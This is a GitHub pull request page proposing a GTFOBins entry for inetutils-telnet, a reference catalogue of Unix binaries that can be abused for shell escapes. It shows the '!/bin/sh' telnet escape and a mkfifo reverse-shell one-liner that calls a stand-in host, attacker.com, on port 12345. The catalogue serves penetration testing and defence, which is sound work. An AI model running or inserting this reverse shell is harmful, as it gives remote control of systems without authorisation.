Skip to content

Inetutils telnet - #594

Open
alirezakahknezhad wants to merge 3 commits into
GTFOBins:masterfrom
alirezakahknezhad:inetutils-telnet
Open

alirezakahknezhad wants to merge 3 commits into
GTFOBins:masterfrom
alirezakahknezhad:inetutils-telnet

Conversation

@alirezakahknezhad

Copy link
Copy Markdown

Add inetutils-telnet shell and reverse-shell capabilities

This pull request adds a new GTFOBins entry for inetutils-telnet.

inetutils-telnet provides multiple abuse primitives that can be used for command execution and remote shell access.

Shell

The telnet client supports command execution through its escape command feature:

inetutils-telnet
!/bin/sh

```bash
mkfifo /path/to/temp-socket
inetutils-telnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket

Added telnet-ssl entry with reverse shell functionality.
Add telnet-ssl for reverse shell exploitation
Added inetutils-telnet with shell and reverse shell functions.

This branch has not been deployed

No deployments
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant